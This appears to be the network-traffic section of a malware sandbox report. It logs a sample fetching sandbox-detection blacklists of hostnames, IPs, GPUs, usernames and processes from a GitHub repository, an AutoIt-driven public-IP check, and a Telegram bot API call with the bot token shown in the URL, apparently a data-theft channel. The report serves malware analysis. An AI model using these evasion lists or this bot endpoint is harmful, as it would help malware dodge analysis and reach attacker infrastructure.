                                                                                                                                                                                                                                                          Expires: Fri, 29 Nov 2024 10:02:12 GMT
                                                                                                                                                                                                                                                          Source-Age: 2
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC1378INData Raw: 30 30 39 30 30 42 43 38 33 38 30 32 0a 30 30 39 30 30 42 43 38 33 38 30 33 0a 30 43 43 34 37 41 43 38 33 38 30 33 0a 31 38 43 39 41 43 44 46 2d 37 43 30 30 2d 34 0a 33 43 45 43 45 46 43 38 33 38 30 36 0a 36 43 34 45 37 33 33 46 2d 43 32 44 39 2d 34 0a 41 42 49 47 41 49 0a 41 43 45 50 43 0a 41 49 44 41 4e 50 43 0a 41 4c 45 4e 4d 4f 4f 53 2d 50 43 0a 41 4c 49 4f 4e 45 0a 41 50 50 4f 4e 46 4c 59 2d 56 50 53 0a 41 52 43 48 49 42 41 4c 44 50 43 0a 61 7a 75 72 65 0a 42 33 30 46 30 32 34 32 2d 31 43 36 41 2d 34 0a 42 41 52 4f 53 49 4e 4f 2d 50 43 0a 42 45 43 4b 45 52 2d 50 43 0a 42 45 45 37 33 37 30 43 2d 38 43 30 43 2d 34 0a 43 38 31 46 36 36 43 38 33 38 30 35 0a 43 41 54 57 52 49 47 48 54 0a 43 48 53 48 41 57 0a 43 4f 46 46 45 45 2d 53 48 4f 50 0a 43 4f 4d 50
                                                                                                                                                                                                                                                          Data Ascii: 00900BC8380200900BC838030CC47AC8380318C9ACDF-7C00-43CECEFC838066C4E733F-C2D9-4ABIGAIACEPCAIDANPCALENMOOS-PCALIONEAPPONFLY-VPSARCHIBALDPCazureB30F0242-1C6A-4BAROSINO-PCBECKER-PCBEE7370C-8C0C-4C81F66C83805CATWRIGHTCHSHAWCOFFEE-SHOPCOMP
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC1378INData Raw: 46 4f 0a 44 45 53 4b 54 4f 50 2d 4c 54 4d 43 4b 4c 41 0a 44 45 53 4b 54 4f 50 2d 4d 4a 43 36 35 30 30 0a 44 45 53 4b 54 4f 50 2d 4d 57 46 52 56 4b 48 0a 44 45 53 4b 54 4f 50 2d 4e 41 4b 46 46 4d 54 0a 44 45 53 4b 54 4f 50 2d 4e 4b 50 30 49 34 50 0a 44 45 53 4b 54 4f 50 2d 4e 4d 31 5a 50 4c 47 0a 44 45 53 4b 54 4f 50 2d 4e 54 55 37 56 55 4f 0a 44 45 53 4b 54 4f 50 2d 4f 36 46 42 4d 46 37 0a 44 45 53 4b 54 4f 50 2d 4f 37 42 49 33 50 54 0a 44 45 53 4b 54 4f 50 2d 50 41 30 46 4e 56 35 0a 44 45 53 4b 54 4f 50 2d 50 4b 51 4e 44 53 52 0a 44 45 53 4b 54 4f 50 2d 51 4c 4e 32 56 55 46 0a 44 45 53 4b 54 4f 50 2d 51 55 41 59 38 47 53 0a 44 45 53 4b 54 4f 50 2d 52 43 41 33 51 57 58 0a 44 45 53 4b 54 4f 50 2d 52 48 58 44 4b 57 57 0a 44 45 53 4b 54 4f 50 2d 52 50 34 46
                                                                                                                                                                                                                                                          Data Ascii: FODESKTOP-LTMCKLADESKTOP-MJC6500DESKTOP-MWFRVKHDESKTOP-NAKFFMTDESKTOP-NKP0I4PDESKTOP-NM1ZPLGDESKTOP-NTU7VUODESKTOP-O6FBMF7DESKTOP-O7BI3PTDESKTOP-PA0FNV5DESKTOP-PKQNDSRDESKTOP-QLN2VUFDESKTOP-QUAY8GSDESKTOP-RCA3QWXDESKTOP-RHXDKWWDESKTOP-RP4F
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC389INData Raw: 45 45 4c 35 33 53 4e 0a 57 49 4e 5a 44 53 2d 31 42 48 52 56 50 51 55 0a 57 49 4e 5a 44 53 2d 32 32 55 52 4a 49 42 56 0a 57 49 4e 5a 44 53 2d 33 46 46 32 49 39 53 4e 0a 57 49 4e 5a 44 53 2d 35 4a 37 35 44 54 48 48 0a 57 49 4e 5a 44 53 2d 36 54 55 49 48 4e 37 52 0a 57 49 4e 5a 44 53 2d 38 4d 41 45 49 38 45 34 0a 57 49 4e 5a 44 53 2d 39 49 4f 37 35 53 56 47 0a 57 49 4e 5a 44 53 2d 41 4d 37 36 48 50 4b 32 0a 57 49 4e 5a 44 53 2d 42 30 33 4c 39 43 45 4f 0a 57 49 4e 5a 44 53 2d 42 4d 53 4d 44 38 4d 45 0a 57 49 4e 5a 44 53 2d 42 55 41 4f 4b 47 47 31 0a 57 49 4e 5a 44 53 2d 4b 37 56 49 4b 34 46 43 0a 57 49 4e 5a 44 53 2d 4d 49 4c 4f 42 4d 33 35 0a 57 49 4e 5a 44 53 2d 50 55 30 55 52 50 56 49 0a 57 49 4e 5a 44 53 2d 51 4e 47 4b 47 4e 35 39 0a 57 49 4e 5a 44 53 2d
                                                                                                                                                                                                                                                          Data Ascii: EEL53SNWINZDS-1BHRVPQUWINZDS-22URJIBVWINZDS-3FF2I9SNWINZDS-5J75DTHHWINZDS-6TUIHN7RWINZDS-8MAEI8E4WINZDS-9IO75SVGWINZDS-AM76HPK2WINZDS-B03L9CEOWINZDS-BMSMD8MEWINZDS-BUAOKGG1WINZDS-K7VIK4FCWINZDS-MILOBM35WINZDS-PU0URPVIWINZDS-QNGKGN59WINZDS-


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          1192.168.2.449733185.199.110.1334434828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC126OUTGET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1
                                                                                                                                                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC894INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: max-age=300
                                                                                                                                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                          ETag: "b8ccbe01df84b6df59046ff7ef97fe02bbba9374a7a63f24d1c8a0b07083adca"
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          X-GitHub-Request-Id: F0F4:35108B:983CD:A6B92:67498FF6
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:12 GMT
                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                          X-Served-By: cache-ewr-kewr1740021-EWR
                                                                                                                                                                                                                                                          X-Cache: HIT
                                                                                                                                                                                                                                                          X-Cache-Hits: 1
                                                                                                                                                                                                                                                          X-Timer: S1732874233.519179,VS0,VE1
                                                                                                                                                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          X-Fastly-Request-ID: 97faba4fe069289920342115ac1779551f03b39d
                                                                                                                                                                                                                                                          Expires: Fri, 29 Nov 2024 10:02:12 GMT
                                                                                                                                                                                                                                                          Source-Age: 2
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC31INData Raw: 56 6d 52 65 6d 6f 74 65 47 75 65 73 74 2e 65 78 65 0a 53 79 73 6d 6f 6e 36 34 2e 65 78 65 0a
                                                                                                                                                                                                                                                          Data Ascii: VmRemoteGuest.exeSysmon64.exe


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          2192.168.2.449736185.199.110.1334434828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC119OUTGET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1
                                                                                                                                                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC897INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Content-Length: 2853
                                                                                                                                                                                                                                                          Cache-Control: max-age=300
                                                                                                                                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                          ETag: "a0f0ad87a3cc1741bf24d6d8ec37619ff28dab76edf802ca5ceb0e1349232152"
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          X-GitHub-Request-Id: 44DC:1D95DE:656FD:73A52:67498FF6
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:12 GMT
                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                          X-Served-By: cache-nyc-kteb1890082-NYC
                                                                                                                                                                                                                                                          X-Cache: MISS
                                                                                                                                                                                                                                                          X-Cache-Hits: 0
                                                                                                                                                                                                                                                          X-Timer: S1732874233.528719,VS0,VE8
                                                                                                                                                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          X-Fastly-Request-ID: 8b3b7b7689fc145b2e4c220b6f14f8cdca288520
                                                                                                                                                                                                                                                          Expires: Fri, 29 Nov 2024 10:02:12 GMT
                                                                                                                                                                                                                                                          Source-Age: 0
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC1378INData Raw: 31 30 2e 32 30 30 2e 31 36 39 2e 32 30 34 0a 31 30 34 2e 31 39 38 2e 31 35 35 2e 31 37 33 0a 31 30 34 2e 32 30 30 2e 31 35 31 2e 33 35 0a 31 30 39 2e 31 34 35 2e 31 37 33 2e 31 36 39 0a 31 30 39 2e 32 32 36 2e 33 37 2e 31 37 32 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 30 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 31 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 32 0a 31 34 30 2e 32 32 38 2e 32 31 2e 33 36 0a 31 34 39 2e 38 38 2e 31 31 31 2e 37 39 0a 31 35 34 2e 36 31 2e 37 31 2e 35 30 0a 31 35 34 2e 36 31 2e 37 31 2e 35 31 0a 31 37 32 2e 31 30 35 2e 38 39 2e 32 30 32 0a 31 37 34 2e 37 2e 33 32 2e 31 39 39 0a 31 37 36 2e 36 33 2e 34 2e 31 37 39 0a 31 37 38 2e 32 33 39 2e 31 36 35 2e 37 30 0a 31 38 31 2e 32 31 34 2e 31 35 33 2e 31 31 0a 31 38 35 2e 32 32 30 2e 31 30 31
                                                                                                                                                                                                                                                          Data Ascii: 10.200.169.204104.198.155.173104.200.151.35109.145.173.169109.226.37.172109.74.154.90109.74.154.91109.74.154.92140.228.21.36149.88.111.79154.61.71.50154.61.71.51172.105.89.202174.7.32.199176.63.4.179178.239.165.70181.214.153.11185.220.101
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC1378INData Raw: 30 2e 31 31 38 0a 32 31 33 2e 33 33 2e 31 39 30 2e 31 37 31 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 37 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 33 35 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 36 0a 32 31 33 2e 33 33 2e 31 39 30 2e 36 39 0a 32 31 33 2e 33 33 2e 31 39 30 2e 37 34 0a 32 33 2e 31 32 38 2e 32 34 38 2e 34 36 0a 33 34 2e 31 30 35 2e 30 2e 32 37 0a 33 34 2e 31 30 35 2e 31 38 33 2e 36 38 0a 33 34 2e 31 30 35 2e 37 32 2e 32 34 31 0a 33 34 2e 31 33 38 2e 32 35 35 2e 31 30 34 0a 33 34 2e 31 33 38 2e 39 36 2e 32 33 0a 33 34 2e 31 34 31 2e 31 34 36 2e 31 31 34 0a 33 34 2e 31 34 31 2e 32 34 35 2e 32 35 0a 33 34 2e 31 34 32 2e 37 34
                                                                                                                                                                                                                                                          Data Ascii: 0.118213.33.190.171213.33.190.22213.33.190.227213.33.190.242213.33.190.35213.33.190.42213.33.190.46213.33.190.69213.33.190.7423.128.248.4634.105.0.2734.105.183.6834.105.72.24134.138.255.10434.138.96.2334.141.146.11434.141.245.2534.142.74
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC97INData Raw: 35 2e 37 31 2e 36 35 0a 39 35 2e 32 35 2e 37 31 2e 37 30 0a 39 35 2e 32 35 2e 37 31 2e 38 30 0a 39 35 2e 32 35 2e 37 31 2e 38 36 0a 39 35 2e 32 35 2e 37 31 2e 38 37 0a 39 35 2e 32 35 2e 37 31 2e 38 39 0a 39 35 2e 32 35 2e 37 31 2e 39 32 0a 39 35 2e 32 35 2e 38 31 2e 32 34 0a 4e 6f 6e 65 0a
                                                                                                                                                                                                                                                          Data Ascii: 5.71.6595.25.71.7095.25.71.8095.25.71.8695.25.71.8795.25.71.8995.25.71.9295.25.81.24None


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          3192.168.2.449735185.199.110.1334434828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC120OUTGET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1
                                                                                                                                                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Content-Length: 1246
                                                                                                                                                                                                                                                          Cache-Control: max-age=300
                                                                                                                                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                          ETag: "30981a4a96ce3533cb33ae7620077db7a4a8377cb1ef8fcfc8a07293fa2937d6"
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          X-GitHub-Request-Id: 7E09:1CF27F:96EA1:A565C:67498FF6
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:12 GMT
                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                          X-Served-By: cache-ewr-kewr1740054-EWR
                                                                                                                                                                                                                                                          X-Cache: HIT
                                                                                                                                                                                                                                                          X-Cache-Hits: 1
                                                                                                                                                                                                                                                          X-Timer: S1732874233.519931,VS0,VE1
                                                                                                                                                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          X-Fastly-Request-ID: f9305fd6f905583068a7b8074713863a284ba25b
                                                                                                                                                                                                                                                          Expires: Fri, 29 Nov 2024 10:02:12 GMT
                                                                                                                                                                                                                                                          Source-Age: 2
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC1246INData Raw: 32 39 5f 5f 48 45 52 45 0a 32 47 36 43 37 5a 36 31 0a 32 52 4f 5f 38 55 56 55 0a 32 53 4e 35 33 38 4b 34 0a 35 4b 42 4b 34 31 5f 4c 0a 35 4c 58 50 41 38 45 53 0a 35 50 45 43 4e 36 4c 31 0a 35 52 50 46 54 33 48 5a 0a 36 42 4f 53 34 4f 37 55 0a 36 42 5a 50 32 59 32 5f 0a 36 46 34 34 41 44 52 37 0a 36 4d 50 41 39 33 0a 37 32 32 39 48 39 47 39 0a 37 34 5a 5a 43 59 37 41 0a 37 54 42 39 47 36 50 37 0a 38 34 4b 44 31 4b 53 4b 0a 38 4e 59 47 4b 33 46 4c 0a 38 59 33 42 53 58 4b 47 0a 39 53 46 37 32 46 47 37 0a 39 5a 37 37 44 4e 34 54 0a 5f 47 33 31 45 34 36 4e 0a 5f 50 48 4c 4e 59 47 52 0a 5f 54 39 57 35 4c 48 4f 0a 41 46 52 42 52 36 54 43 0a 41 4d 44 20 52 61 64 65 6f 6e 20 48 44 20 38 36 35 30 47 0a 41 53 50 45 45 44 20 47 72 61 70 68 69 63 73 20 46 61 6d 69 6c
                                                                                                                                                                                                                                                          Data Ascii: 29__HERE2G6C7Z612RO_8UVU2SN538K45KBK41_L5LXPA8ES5PECN6L15RPFT3HZ6BOS4O7U6BZP2Y2_6F44ADR76MPA937229H9G974ZZCY7A7TB9G6P784KD1KSK8NYGK3FL8Y3BSXKG9SF72FG79Z77DN4T_G31E46N_PHLNYGR_T9W5LHOAFRBR6TCAMD Radeon HD 8650GASPEED Graphics Famil


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          4192.168.2.449737185.199.110.1334434828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC123OUTGET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1
                                                                                                                                                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC897INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Content-Length: 1110
                                                                                                                                                                                                                                                          Cache-Control: max-age=300
                                                                                                                                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                          ETag: "1224175461dce581d971884e2b8af67d12f105702cbcc56be1043ccc84319e42"
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          X-GitHub-Request-Id: AD0E:370AE7:92613:A0DDF:67498FF8
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:12 GMT
                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                          X-Served-By: cache-ewr-kewr1740046-EWR
                                                                                                                                                                                                                                                          X-Cache: MISS
                                                                                                                                                                                                                                                          X-Cache-Hits: 0
                                                                                                                                                                                                                                                          X-Timer: S1732874233.531647,VS0,VE8
                                                                                                                                                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          X-Fastly-Request-ID: d7ae3d89f5bc11fac2160f12f285813484371612
                                                                                                                                                                                                                                                          Expires: Fri, 29 Nov 2024 10:02:12 GMT
                                                                                                                                                                                                                                                          Source-Age: 0
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC1110INData Raw: 30 38 31 61 62 33 39 35 2d 35 65 38 35 2d 34 36 33 34 2d 61 63 64 62 2d 32 64 62 64 34 66 35 39 61 37 64 30 0a 30 38 39 65 36 32 31 63 2d 31 34 32 32 2d 34 38 35 36 2d 61 38 62 31 2d 33 66 31 64 62 32 30 38 63 65 39 65 0a 31 30 37 39 37 66 31 64 2d 39 36 31 33 2d 34 38 33 32 2d 62 31 61 33 2d 63 32 32 66 65 33 36 35 62 38 39 64 0a 31 35 39 34 37 38 30 32 2d 63 62 39 63 2d 34 37 38 66 2d 61 66 35 63 2d 33 33 62 31 61 62 62 64 31 62 66 65 0a 31 61 38 35 63 36 36 30 2d 31 66 39 38 2d 34 32 63 61 2d 62 31 63 62 2d 31 39 39 66 36 33 65 31 64 38 30 37 0a 32 62 35 33 36 35 66 31 2d 65 65 62 62 2d 34 31 33 35 2d 62 36 65 31 2d 34 31 33 61 61 62 32 39 39 66 63 62 0a 34 35 30 38 61 66 64 33 2d 35 66 30 35 2d 34 39 31 65 2d 62 34 39 66 2d 62 34 34 30 32 34 39 36 37
                                                                                                                                                                                                                                                          Data Ascii: 081ab395-5e85-4634-acdb-2dbd4f59a7d0089e621c-1422-4856-a8b1-3f1db208ce9e10797f1d-9613-4832-b1a3-c22fe365b89d15947802-cb9c-478f-af5c-33b1abbd1bfe1a85c660-1f98-42ca-b1cb-199f63e1d8072b5365f1-eebb-4135-b6e1-413aab299fcb4508afd3-5f05-491e-b49f-b44024967


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          5192.168.2.449734185.199.110.1334434828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC128OUTGET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1
                                                                                                                                                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Content-Length: 1275
                                                                                                                                                                                                                                                          Cache-Control: max-age=300
                                                                                                                                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                          ETag: "bbf75a064e165fba2b8fcc6595e496788fe27c3185ffa2fa56d3479e12867693"
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          X-GitHub-Request-Id: E854:128C4E:AEAFA:BD2CE:67498FF8
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:12 GMT
                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                          X-Served-By: cache-ewr-kewr1740041-EWR
                                                                                                                                                                                                                                                          X-Cache: HIT
                                                                                                                                                                                                                                                          X-Cache-Hits: 1
                                                                                                                                                                                                                                                          X-Timer: S1732874233.566920,VS0,VE1
                                                                                                                                                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          X-Fastly-Request-ID: fdaaa3148eec392ac7a87dbe690e9a020d8e548f
                                                                                                                                                                                                                                                          Expires: Fri, 29 Nov 2024 10:02:12 GMT
                                                                                                                                                                                                                                                          Source-Age: 0
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC1275INData Raw: 30 35 68 30 30 47 69 30 0a 30 35 4b 76 41 55 51 4b 50 51 0a 32 31 7a 4c 75 63 55 6e 66 49 38 35 0a 33 75 32 76 39 6d 38 0a 34 33 42 79 34 0a 34 74 67 69 69 7a 73 4c 69 6d 53 0a 35 73 49 42 4b 0a 35 59 33 79 37 33 0a 67 72 65 70 65 74 65 0a 36 34 46 32 74 4b 49 71 4f 35 0a 36 4f 34 4b 79 48 68 4a 58 42 69 52 0a 37 44 42 67 64 78 75 0a 37 77 6a 6c 47 58 37 50 6a 6c 57 34 0a 38 4c 6e 66 41 61 69 39 51 64 4a 52 0a 38 4e 6c 30 43 6f 6c 4e 51 35 62 71 0a 38 56 69 7a 53 4d 0a 39 79 6a 43 50 73 45 59 49 4d 48 0a 41 62 62 79 0a 61 63 6f 78 0a 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 0a 41 6d 79 0a 61 6e 64 72 65 61 0a 41 70 70 4f 6e 46 6c 79 53 75 70 70 6f 72 74 0a 41 53 50 4e 45 54 0a 61 7a 75 72 65 0a 62 61 72 62 61 72 72 61 79 0a 62 65 6e 6a 61 68 0a 42 72 75 6e
                                                                                                                                                                                                                                                          Data Ascii: 05h00Gi005KvAUQKPQ21zLucUnfI853u2v9m843By44tgiizsLimS5sIBK5Y3y73grepete64F2tKIqO56O4KyHhJXBiR7DBgdxu7wjlGX7PjlW48LnfAai9QdJR8Nl0ColNQ5bq8VizSM9yjCPsEYIMHAbbyacoxAdministratorAmyandreaAppOnFlySupportASPNETazurebarbarraybenjahBrun


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          6192.168.2.449738188.138.68.2124434924C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:13 UTC90OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:13 UTC257INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:16 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 1865
                                                                                                                                                                                                                                                          Last-Modified: Sun, 20 Feb 2022 14:25:18 GMT
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          ETag: "62124f4e-749"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-11-29 09:57:13 UTC1865INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 68 72 65 66 3d 22 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2d 31 36 2e 70 6e 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 73 69 7a
                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=""><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" sizes="16x16" href="/img/favicon-16.png"><link rel="icon" siz


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          7192.168.2.449739149.154.167.2204434828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:14 UTC121OUTGET /bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/getMe HTTP/1.1
                                                                                                                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:15 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:15 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
